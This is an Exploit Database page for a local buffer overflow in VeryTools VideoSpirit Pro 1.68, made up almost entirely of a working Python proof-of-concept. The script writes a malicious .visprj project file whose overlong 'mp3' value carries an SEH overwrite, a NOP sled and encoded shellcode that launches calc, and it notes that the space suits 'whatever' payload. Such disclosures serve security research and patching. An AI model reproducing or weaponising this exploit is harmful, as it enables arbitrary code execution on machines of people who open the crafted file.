VeryTools VideoSpirit Pro 1.68 – Local Buffer Overflow

• Exploit Database
• 106 阅读

• 作者： xsploitedsec
  日期： 2011-01-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15936/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154

  # Exploit Title: VideoSpirit Pro v1.68 Local BoF Exploit # Date: 01/08/2011 # Author: xsploitedsec # URL: http://www.x-sploited.com/ # Contact: xsploitedsec[at]x-sploited.com # Software Link: http://www.verytools.com/videospirit/download.html # Vulnerable version: v1.68 # Tested on: Windows XP SP3 Eng   # Software description # # "VideoSpirit Pro is the most easily used Video Converter/Editor tools. For acting as a Video Editor, # various slide effect/title/subtitle can be added to a video clip. Also, the video clip can be rotated, # resized and warped. Multiple video/audio clips can be joined together. Converting speed is fast and # the quality of output file is excellent."   # Vulnerability info # # VideoSpirit Pro is prone to a buffer overflow when parsing a (.visprj) project file that # contains an overly long "mp3" value. This is because the application fails to properly bounds # check the data before it is passed to strcpy().   #!/usr/bin/python import struct,sys,os   banner = ( "\r\n==============================================\n" " VideoSpirit Pro v1.68 Local BoF PoC\n" " Author: xsploitedsec\n URL: http://www.x-sploited.com/\n" "==============================================\n"); print banner;   if len(sys.argv) < 2: print ("\r[!] Error No filename specified\n\nUsage:\n\n" + os.path.basename(sys.argv[0]) + " <outfile.visprj>"); outfile = "xsploited.visprj"; #default defaultname = 1; else: outfile = sys.argv[1]; defaultname = 0;   # msfpayload windows/exec CMD=calc EXITFUNC=seh R | msfencode -e x86/fnstenv_mov # -c 1 -b &apos;\x00\x22\x0a\x0b\x1c\x0c\x2f\x21&apos; > /tmp/encoded.txt # [*] x86/fnstenv_mov succeeded with size 222 (iteration=1)   calc = ( "\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf" "\xf8\x92\x62\x83\xeb\xfc\xe2\xf4\x43\x10\x1b\x62\xbf\xf8" "\xf2\xeb\x5a\xc9\x40\x06\x34\xaa\xa2\xe9\xed\xf4\x19\x30" "\xab\x73\xe0\x4a\xb0\x4f\xd8\x44\x8e\x07\xa3\xa2\x13\xc4" "\xf3\x1e\xbd\xd4\xb2\xa3\x70\xf5\x93\xa5\x5d\x08\xc0\x35" "\x34\xaa\x82\xe9\xfd\xc4\x93\xb2\x34\xb8\xea\xe7\x7f\x8c" "\xd8\x63\x6f\xa8\x19\x2a\xa7\x73\xca\x42\xbe\x2b\x71\x5e" "\xf6\x73\xa6\xe9\xbe\x2e\xa3\x9d\x8e\x38\x3e\xa3\x70\xf5" "\x93\xa5\x87\x18\xe7\x96\xbc\x85\x6a\x59\xc2\xdc\xe7\x80" "\xe7\x73\xca\x46\xbe\x2b\xf4\xe9\xb3\xb3\x19\x3a\xa3\xf9" "\x41\xe9\xbb\x73\x93\xb2\x36\xbc\xb6\x46\xe4\xa3\xf3\x3b" "\xe5\xa9\x6d\x82\xe7\xa7\xc8\xe9\xad\x13\x14\x3f\xd5\xf9" "\x1f\xe7\x06\xf8\x92\x62\xef\x90\xa3\xe9\xd0\x7f\x6d\xb7" "\x04\x06\x9c\x50\x55\x90\x34\xf7\x02\x65\x6d\xb7\x83\xfe" "\xee\x68\x3f\x03\x72\x17\xba\x43\xd5\x71\xcd\x97\xf8\x62" "\xec\x07\x47\x01\xde\x94\xf1\x62\xb5\xf8\x92\x62");   header = ( "\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x22\x20" "\x2F\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74" "\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0D\x0A\x20" "\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20" "\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65" "\x3D\x22\x32\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20" "\x76\x61\x6C\x75\x65\x3D\x22\x31\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x3C" "\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0D\x0A" "\x3C\x2F\x74\x72\x61\x63\x6B\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F" "\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x31\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x69" "\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x42\x6C\x75\x65\x20\x68\x69\x6C\x6C" "\x73\x2E\x6A\x70\x67\x22\x20\x73\x65\x74\x3D\x22\x33\x22\x20\x76\x61\x6C\x75" "\x65\x3D\x22\x30\x31\x30\x30\x30\x30\x30\x30\x35\x39\x30\x30\x30\x30\x30\x30" "\x34\x33\x33\x41\x35\x43\x34\x34\x36\x46\x36\x33\x37\x35\x36\x44\x36\x35\x36" "\x45\x37\x34\x37\x33\x32\x30\x36\x31\x36\x45\x36\x34\x32\x30\x35\x33\x36\x35" "\x37\x34\x37\x34\x36\x39\x36\x45\x36\x37\x37\x33\x35\x43\x34\x31\x36\x43\x36" "\x43\x32\x30\x35\x35\x37\x33\x36\x35\x37\x32\x37\x33\x35\x43\x34\x34\x36\x46" "\x36\x33\x37\x35\x36\x44\x36\x35\x36\x45\x37\x34\x37\x33\x35\x43\x34\x44\x37" "\x39\x32\x30\x35\x30\x36\x39\x36\x33\x37\x34\x37\x35\x37\x32\x36\x35\x37\x33" "\x35\x43\x35\x33\x36\x31\x36\x44\x37\x30\x36\x43\x36\x35\x32\x30\x35\x30\x36" "\x39\x36\x33\x37\x34\x37\x35\x37\x32\x36\x35\x37\x33\x35\x43\x34\x32\x36\x43" "\x37\x35\x36\x35\x32\x30\x36\x38\x36\x39\x36\x43\x36\x43\x37\x33\x32\x45\x36" "\x41\x37\x30\x36\x37\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x45\x30\x30" "\x30\x30\x30\x30\x30\x33\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x38\x34\x32\x30\x30" "\x30\x30\x34\x38\x34\x32\x30\x30\x30\x30\x38\x37\x34\x33\x30\x30\x30\x30\x34" "\x38\x34\x32\x30\x30\x30\x30\x38\x37\x34\x33\x30\x30\x30\x30\x33\x45\x34\x33" "\x30\x30\x30\x30\x34\x38\x34\x32\x30\x30\x30\x30\x33\x45\x34\x33\x34\x30\x30" "\x31\x30\x30\x30\x30\x46\x30\x30\x30\x30\x30\x30\x30\x46\x46\x30\x30\x30\x30" "\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x30\x32\x30\x30\x30\x30\x30\x30\x43" "\x38\x43\x38\x43\x38\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x30\x30\x30" "\x30\x36\x45\x36\x46\x30\x30\x45\x45\x45\x45\x45\x45\x45\x45\x30\x30\x30\x30" "\x30\x30\x30\x30\x30\x30\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x74\x72\x61\x63\x6B" "\x31\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0D\x0A\x3C\x74\x72" "\x61\x63\x6B\x33\x20\x2F\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E" "\x0D\x0A\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0D\x0A\x3C\x6F\x75\x74\x70\x75\x74" "\x20\x74\x79\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65" "\x70\x61\x73\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71" "\x75\x61\x6C\x69\x74\x79\x3D\x22\x30\x22\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74" "\x79\x70\x65\x30\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0D\x0A\x20" "\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D" "\x65\x3D\x22\x6D\x73\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65" "\x3D\x22\x6D\x73\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0D\x0A\x20\x20" "\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65" "\x3D\x22\x33\x32\x30\x2A\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C" "\x75\x65\x3D\x22\x33\x32\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0D\x0A\x20\x20" "\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65" "\x3D\x22\x33\x30\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E" "\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20" "\x6E\x61\x6D\x65\x3D\x22\x31\x36\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65" "\x3D\x22\x31\x36\x30\x30\x30\x6B\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x3C" "\x2F\x74\x79\x70\x65\x30\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x31" "\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0D\x0A\x20\x20\x20\x20\x20" "\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D" "\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22");   footer = ( "\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69" "\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C" "\x75\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x20" "\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34" "\x34\x31\x30\x30\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22" "\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74" "\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29" "\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20" "\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74\x79\x70" "\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0D\x0A\x3C" "\x2F\x6F\x75\x74\x70\x75\x74\x3E\x0D\x0A");   payload = "\x41" * 104; payload += "\xEB\x06\x90\x90"; #short jmp payload += struct.pack("<L",0x100B0B94); #p/p/r - overlayplug.dll (Apps path) payload += "\x90" * 24; #small nop sled payload += calc; #plenty of room for whatever   payload += "\x42" * (5000 - len(payload)); #junk padding   finalstr = (header + payload + footer);   if defaultname == 1: print("\n[!] Defaulting to xsploited.visprj"); print("[*] Creating malicious project file"); try: out_file = open(outfile,&apos;w&apos;); out_file.write(finalstr); out_file.close(); print("[+] File created successfully ("+ outfile + ")\n[-] Exiting...\r"); except (IOError): print("[!] Error: unable to create file \n[-] Exiting...\r");